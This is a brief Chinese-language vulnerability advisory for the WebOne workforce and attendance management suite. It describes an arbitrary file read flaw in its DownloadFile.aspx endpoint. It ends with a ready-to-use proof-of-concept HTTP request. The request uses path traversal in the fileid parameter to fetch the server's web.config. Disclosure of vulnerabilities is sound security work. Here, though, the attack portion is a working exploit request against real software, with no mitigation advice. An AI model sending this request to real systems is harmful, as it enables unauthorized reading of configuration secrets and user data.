漏洞描述
WebOne 劳动力与考勤管理套件是一款用于企业劳动力与考勤管理的软件。该套件的 /webForms/Download/DownloadFile.aspx 接口存在任意文件读取漏洞,攻击者可以通过构造恶意参数读取服务器上的任意文件,可能导致敏感信息泄露,如配置文件和用户数据等。此漏洞对企业的业务安全和数据隐私构成严重威胁。
WebOne 劳动力与考勤管理套件 /webForms/Download/DownloadFile.aspx 文件读取漏洞
PoC代码
GET /webForms/Download/DownloadFile.aspx?fileid=/../../web.config&flag=report HTTP/1.1